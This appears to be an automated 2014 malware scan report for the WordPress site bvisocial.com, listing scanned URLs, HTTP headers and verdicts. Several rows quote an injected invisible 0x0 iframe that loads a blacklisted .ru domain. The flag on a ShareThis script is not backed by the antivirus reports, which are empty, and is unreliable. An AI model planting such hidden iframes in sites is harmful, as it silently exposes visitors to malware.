Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bvisocial.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bvisocial.com/ | 200 OK Content-Length: 24193 Content-Type: text/html | malicious |
Malicious iFrame found. size: 0x0 src: http://dunat.ru/ This URL is marked by Google as suspicious <iframe src="http://dunat.ru/" width=0 height=0> | ||
http://bvisocial.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 10 Oct 2014 10:40:13 GMT Pragma: no-cache Location: http://bvisocial.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=fb864cad2db94b5b24683b0c66bc8dd7; path=/ X-Pingback: http://bvisocial.com/xmlrpc.php | clean |
http://bvisocial.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 91012 Content-Type: text/html | malicious |
Page code contains blacklisted domain: dunat.ru <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width,initial-scale=1"> <title>Page not found | BVISocial</title> <link rel="stylesheet" href="http://bvisocial.com/wp-content/the ...[4307 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://dunat.ru/ This URL is marked by Google as suspicious <iframe src="http://dunat.ru/" width=0 height=0> | ||
http://bvisocial.com//ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 10 Oct 2014 10:40:17 GMT Pragma: no-cache Location: http://bvisocial.com/ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=267d1c81003536cb3f88b5253dcb15dd; path=/ X-Pingback: http://bvisocial.com/xmlrpc.php | clean |
http://bvisocial.com/ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js/ | 404 Not Found Content-Length: 91014 Content-Type: text/html | malicious |
Page code contains blacklisted domain: dunat.ru <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width,initial-scale=1"> <title>Page not found | BVISocial</title> <link rel="stylesheet" href="http://bvisocial.com/wp-content/the ...[4307 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://dunat.ru/ This URL is marked by Google as suspicious <iframe src="http://dunat.ru/" width=0 height=0> | ||
http://bvisocial.com/wp-content/themes/fm/js/jquery.bxslider.min.js | 200 OK Content-Length: 14705 Content-Type: application/javascript | clean |
http://w.sharethis.com/button/buttons.js | 200 OK Content-Length: 145804 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof(stlib)=="undefined"){var stlib={}}if(!stlib.functions){stlib.functions=[];stlib.functionCount=0}stlib.global={};stlib.global.hash=document.location.href.split("#");stlib.global.hash.shift();stlib.global.hash=stlib.global.hash.join("#");stlib.dynamicOn=true;stlib.debugOn=false;stlib.debug={count:0,messages:[],debug:function(b,a){if(a&&(typeof console)!="undefined"){console.log(b)}stlib.debug.messages.push(b)},show:function(a){for(message in stlib.debug.messages){if((typeof conso Antivirus reports:
| ||
http://bvisocial.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://bvisocial.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://bvisocial.com/wp-content/plugins/jetpack/_inc/postmessage.js?ver=2.9.3 | 200 OK Content-Length: 19615 Content-Type: application/javascript | clean |
http://bvisocial.com/wp-content/plugins/jetpack/_inc/jquery.inview.js?ver=2.9.3 | 200 OK Content-Length: 5590 Content-Type: application/javascript | clean |
http://bvisocial.com/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=2.9.3 | 200 OK Content-Length: 8083 Content-Type: application/javascript | clean |
http://platform.tumblr.com/v1/share.js | 200 OK Content-Length: 1717 Content-Type: application/javascript | clean |
http://bvisocial.com//platform.twitter.com/widgets.js?ver=3.8.3/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 10 Oct 2014 10:40:27 GMT Pragma: no-cache Location: http://bvisocial.com/platform.twitter.com/widgets.js?ver=3.8.3/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=0d9e7d5c0b32711d05343e11d6ced1de; path=/ X-Pingback: http://bvisocial.com/xmlrpc.php | clean |
http://bvisocial.com/platform.twitter.com/widgets.js?ver=3.8.3/ | 404 Not Found Content-Length: 12187 Content-Type: text/html | malicious |
Page code contains blacklisted domain: dunat.ru <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width,initial-scale=1"> <title>Page not found | BVISocial</title> <link rel="stylesheet" href="http://bvisocial.com/wp-content/the ...[4483 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://dunat.ru/ This URL is marked by Google as suspicious <iframe src="http://dunat.ru/" width=0 height=0> | ||
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201441 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Octaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://bvisocial.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.8.3 | 200 OK Content-Length: 930 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bvisocial.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 10 Oct 2014 10:40:10 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/P4txKg-5>; rel=shortlink
Set-Cookie: PHPSESSID=7afba7ffcbdb3a1be763ac89cf418bf4; path=/
X-Pingback: http://bvisocial.com/xmlrpc.php
GET / HTTP/1.1
Host: bvisocial.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 10 Oct 2014 10:40:10 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/P4txKg-5>; rel=shortlink
Set-Cookie: PHPSESSID=7afba7ffcbdb3a1be763ac89cf418bf4; path=/
X-Pingback: http://bvisocial.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: bvisocial.com
Referer: http://www.google.com/search?q=bvisocial.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bvisocial.com
Referer: http://www.google.com/search?q=bvisocial.com
Result:
The result is similar to the first query. There are no suspicious redirects found.